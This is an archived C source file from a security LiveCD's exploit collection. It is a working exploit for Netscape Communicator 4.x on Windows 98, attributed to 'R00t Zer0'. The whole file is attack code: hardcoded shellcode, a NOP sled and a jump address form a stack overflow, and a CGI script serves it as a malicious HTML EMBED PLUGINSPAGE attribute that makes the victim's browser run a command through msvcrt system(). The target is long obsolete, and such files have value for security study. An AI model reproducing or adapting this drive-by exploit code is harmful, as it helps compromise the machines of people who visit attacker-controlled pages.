home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webbrowser / Netscape / netscape4-ex.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  2.8 KB  |  84 lines
  1. /************************************************************************/
  2. /*    Netscape communicator 4.06J - 4.6J, 4.61e Exploit for Windows98   */
  3. /*                                                */
  4. /*                    written by R00t Zer0(defcon0@ugtop.com)    */
  5. /*                                                */
  6. /*          DEF CON ZERO( http://www.ugtop.com/defcon0/index.htm)    */
  7. /************************************************************************/
  8.  
  9. #include <stdio.h>
  10. #include <stdlib.h>
  11. #include <string.h>
  12. #include <time.h>
  13. #include <sys/types.h>
  14. #include <sys/stat.h>
  15.  
  16. #define    STACK_LEN        ( 2135 )
  17. #define    EMBED_TYPE_LEN    ( 150 )
  18. #define    XPT_HDL_OFFSET    ( 588 )
  19. #define    JMPS_OFFSET        ( 6 )
  20. #define    JMP_EBX_ADDR    ( 0xbff7a06b )
  21. #define    INT01H_ADDR        ( 0xbff73d30 )
  22. #define    NOP_CODE        ( 0x90 )
  23. #define    JMPS_CODE        ( 0xeb )
  24. #define    FUNCTION        "msvcrt.dll.system.exit."
  25. #define    COMMAND            "welcome.exe"
  26. #define    CMDLENP            ( 65 )
  27.  
  28.  
  29. int
  30. main( void )
  31. {
  32.   u_char win98_exec_code[100] = {
  33.     0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,
  34.     0xF7,0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,0x83,0xC3,0x06,
  35.     0x88,0x23,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
  36.     0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,
  37.     0xF8,0x43,0x53,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,0x33,0xC0,0x50,
  38.     0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,0xFF,0x00 };
  39.  
  40.   u_char    exploit_code[ STACK_LEN ];
  41.   u_char    embed_type[ EMBED_TYPE_LEN ];
  42.   u_long    ip;
  43.   int        loop;
  44.  
  45.   srand( ( u_int )time( 0 ) );
  46.  
  47.   bzero( exploit_code, sizeof( exploit_code ) );
  48.   for( loop = 0; loop < XPT_HDL_OFFSET; loop++ )
  49.     exploit_code [loop ] = NOP_CODE;
  50.  
  51.   /* make exploit code */
  52.   ip = JMP_EBX_ADDR;
  53.   exploit_code[ XPT_HDL_OFFSET - 4 ] = JMPS_CODE;
  54.   exploit_code[ XPT_HDL_OFFSET - 3 ] = JMPS_OFFSET;
  55.   exploit_code[ XPT_HDL_OFFSET + 3 ] = ( char)( 0xff & ( ip >> 24 ) );
  56.   exploit_code[ XPT_HDL_OFFSET + 2 ] = ( char)( 0xff & ( ip >> 16 ) );
  57.   exploit_code[ XPT_HDL_OFFSET + 1 ] = ( char)( 0xff & ( ip >> 8  ) );
  58.   exploit_code[ XPT_HDL_OFFSET + 0 ] = ( char)( 0xff & ( ip >> 0  ) );
  59.  
  60.   win98_exec_code[ CMDLENP ] = strlen( COMMAND );
  61.   strcat( exploit_code, win98_exec_code );
  62.   strcat( exploit_code, FUNCTION );
  63.   strcat( exploit_code, COMMAND );
  64.  
  65.  
  66.   /* set random type */
  67.   for( loop = 0; loop < EMBED_TYPE_LEN; loop++ )
  68.     embed_type[ loop ] = 0x23 + ( rand() % 93 );
  69.  
  70.   /* print html */
  71.   printf( "Content-type: text/html\n\n" );
  72.   printf( "<HTML>\n" );
  73.   printf( "<HEAD>\n" );
  74.   printf( "    <TITLE>Netscape communicator 4.x Exploit!!</TITLE>\n" );
  75.   printf( "</HEAD>\n" );
  76.   printf( "<BODY>\n" );
  77.  
  78.   printf( "<EMBED SRC=\"FreeUNYUN!\" PLUGINSPAGE=\"%s\" ", exploit_code );
  79.   printf( "TYPE=\"%s\" WIDTH=\"1500\" HEIGHT=\"1000\">\n", embed_type  );
  80.   printf( "</EMBED>\n</BODY>\n</HTML>\n" );
  81.  
  82.   return( 0 );
  83. }
  84. /*                    www.hack.co.za              [2000]*/